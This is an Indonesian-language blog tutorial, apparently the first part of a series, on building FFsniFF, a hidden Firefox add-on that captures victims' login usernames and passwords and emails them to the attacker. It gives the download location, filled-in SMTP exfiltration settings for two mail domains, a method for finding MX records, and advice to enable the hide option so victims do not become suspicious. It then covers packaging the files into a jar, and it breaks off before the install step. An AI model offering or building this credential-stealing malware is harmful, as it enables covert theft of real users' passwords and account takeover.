Menjaring Password dengan Firefox Sniffer

Menjaring Password  dengan Firefox Sniffer

Firefox adalah browser andalan saya, terutama untuk urusan penetration testing. Firefox memiliki banyak sekali addon/extension yang sangat membantu untuk bermacam-macam urusan. Namun tidak semua addon membantu pengguna, ada juga addon yang menyadap dan mengirimkan username/password pengguna ketika login ke email attacker, addon itu adalah FFsniFF.

Dalam artikel ini akan menunjukkan simulasi penyadapan password di browser korban dan mengirimkan hasil sadapannya ke email saya di ilmuhacking.com. Setelah itu saya akan jelaskan cara kerja FFsniFF dengan membedah source codenya.

Sekilas tentang  addon Firefox

Addon firefox adalah program dalam javascript yang diload dan diaktifkan setiap firefox dijalankan. Addon ini diperlukan untuk melakukan hal-hal yang tidak disediakan oleh firefox (firefox hanya menyediakan fungsi-fungsi dasar saja). Antarmuka addon ada yang berbentuk ikon di status bar, toolbar atau boleh juga tidak memiliki antarmuka sama sekali. FFsniFF adalah contoh addon yang tidak memiliki antarmuka pengguna sama sekali, hal ini bisa dimaklumi karena memang addon ini harus bersifat stealth.

Addon dipaketkan dan disebarkan dalam bentuk file ZIP, namun ekstensi filenya bukan zip melainkan XPI (dibaca “zippy”). Dalam file xpi tersebut ada banyak file dan folder lain seperti source code javascript, gambar dan file xml deskriptor. File-file yang umumnya ada dalam sebuah paket zippy adalah:

1 exampleExt.xpi:
2               /install.rdf
3               /components/*
4               /components/cmdline.js
5               /defaults/
6               /defaults/preferences/*.js
7               /plugins/*
8               /chrome.manifest
9               /chrome/icons/default/*
10              /chrome/
11              /chrome/content/

Install.rdf adalah deskriptor untuk keperluan instalasi. Selain itu di dalam paket itu juga ada file javascript yang berisi kode program yang menjalankan fungsi addon. Selebihnya adalah file-file untuk menangani user interface addon.

Membuat paket instalasi ffsniff.xpi

Langkah awal saya harus membuat paket instalasi addon ffsniff.xpi. Untuk itu saya harus mengunduh   file   sumber   FFsniFF   dari    http://azurit.elbiahosting.sk/ffsniff/.   Setelah diunduh, file tar.gz itu harus dimekarkan. Isi dari paket itu setelah dimekarkan adalah:

1 pkg_creator.py
2 src/
3 src/install.rdf
4 src/chrome/
5 src/chrome/content/
6 src/chrome/content/ffsniff/
7 src/chrome/content/ffsniff/ffsniffOverlay.xul
8 src/chrome/content/ffsniff/ffsniffOverlay_orig.js
9 src/chrome/content/ffsniff/contents.rdf

File tar.gz itu tidak bisa langsung diinstall ke firefox karena masih berbentuk kumpulan file  yang  harus diubah dan dibungkus  menjadi  paket  zippy (xpi).  Sebenarnya untuk membuat  paket  zippy  sudah  disediakan  script  pkg_creator.py  dalam  bahasa  python, namun dalam artikel ini saya tidak  memakai script  itu  agar  saya bisa  menunjukkan bagaimana proses pembuatan file xpi dari source code.

Setelah  source  berhasil  didownload,  berikutnya  saya  harus  membuat  file ffsniffOverlay.js,  caranya  adalah  dengan  mengcopy  file  ffsniffOverlay_orig.js  dalam nama ffsniffOverlay.js. Setelah itu ffsniffOverlay.js akan saya edit untuk mengubah beberapa variabel berikut:

1 var send_from_host = "<SEND_FROM_HOST>";
2 var send_from = "<SEND_FROM>";
3 var send_to = "<SEND_TO>";
4 var subject = "<SUBJECT>";
5 var smtp_host = "<SMTP_HOST>";
6 var smtp_port = "<SMTP_PORT>";
7 var enable_hide = "<HIDDING>";

Variabel-variabel tersebut adalah parameter untuk mengirim email melalui smtp. smtp_host  berisi alamat  smtp  server  yang  dipakai untuk  mengirim email.  Sebaiknya gunakan smtp server yang bertanggung jawab untuk domain email yang kita tuju, dalam kasus ini domain email tujuan adalah @ilmuhacking.com. Oleh karena itu saya harus mencari smtp server yang bertanggung jawab untuk domain ilmuhacking.com. Cara mencarinya adalah dengan melihat MX record dari DNS ilmuhacking.com. Anda bisa gunakan layanan  dnswatch.info untuk mencari MX record ilmuhacking.com. Perhatikan gambar di samping, terlihat bahwa ternyata smtp server untuk ilmuhacking.com berada di host yang sama,  jadi smtp_host saya isi dengan  ilmuhacking.com. Pada domain  lain biasanya mail server adalah mail.domainanda.com.

send_from dan send_to saya isi dengan nilai yang sama, yaitu testing@ilmuhacking.com, alamat itu adalah alamat email asal dan tujuan. Perhatikan bahwa domain email sumber dan tujuan harus dalam domain yang sama (ilmuhacking.com) karena smtp server umumnya tidak bersedia mengirimkan email ke domain lain (istilahnya open relay) bila pengirim tidak memasukkan password dulu (anonymous).

enable_hide sengaja saya isi “no” untuk kemudahan, dalam kasus nyata variabel ini harus diisi dengan “yes” agar tersembunyi dari daftar addon sehingga tidak membuat korban curiga. Bila anda masih coba-coba, sebaiknya isi dulu dengan “no”.

smtp_port adalah port smtp server, port standar untuk layanan smtp adalah 25. subject adalah subject dari email yang akan berisi password korban.

1 var send_from_host = "ilmuhacking.com";
2 var send_from = "testing@ilmuhacking.com";
3 var send_to = "testing@ilmuhacking.com";
4 var subject = "Log Firefox Sniffer";
5 var smtp_host = "ilmuhacking.com";
6 var smtp_port = "25";
7 var enable_hide = "no";

Konfigurasi smtp untuk  @telkom.net

Agar lebih memahami tentang konfigurasi email ini, saya beri contoh lain dengan email tujuan  ke  telkom.net.Dengan  cara  yang  sama  saya  harus  membaca  MX  record  dari domain telkom.net, ternyata MX record untuk telkom.net ada 2: mx1.mail.plasa.com dan mx2.mail.plasa.com. Terserah mau pilih yang mana saja. Karena memakai smtp server telkom.net, email tujuan harus berada di domain @telkom.net, di sini saya pakai rizki.wicaksono@telkom.net. Alamat asal saya isi sama dengan email tujuan. Ini berarti saya mengirim email dari dan ke email yang sama, itu tidak masalah. send_from_host saya isi dengan telkom.net karena ini adalah domain. Jadi konfigurasi smtp untuk email tujuan @telkom.net adalah sebagai berikut:

1 var send_from_host = "telkom.net";
2 var send_from = "rizki.wicaksono@telkom.net";
3 var send_to = "rizki.wicaksono@telkom.net";
4 var subject = "Log Firefox Sniffer";
5 var smtp_host = "mx1.mail.plasa.com";
6 var smtp_port = "25";
7 var enable_hide = "no";

Membuat file ffsniff.jar

Setelah  variabel-variabel  di  file  ffsniffOverlay.js  sudah  diubah,  langkah  berikutnya adalah membuat  file ffsniff.jar. Walaupun ekstensi filenya adalah jar, sebenarnya ini adalah file zip biasa. File-file yang dimasukkan dalam ffsniff.jar adalah:

content/ffsniff/contents.rdf content/ffsniff/ffsniffOverlay.js content/ffsniff/ffsniffOverlay.xul

Hasil file ffsniff.jar harus mengikutsertakan folder content/ffsniff, tidak boleh 3 file itu dizip tanpa mengikutsertakan foldernya. Jadi untuk membuat file ffsniff.jar harus berada di parent folder dari content/ffsniff. Anda bebas menggunakan program apa saja untuk kompresi zip ini, saya sendiri memakai WinRAR. Ketika dibuka dengan WINRAR isi dari ffsniff.jar tampak seperti gambar di bawah ini, perhatikan kolom pathnya harus berisi seperti itu.

Bersambung >>>>>>>>>>>>>>>>>>>>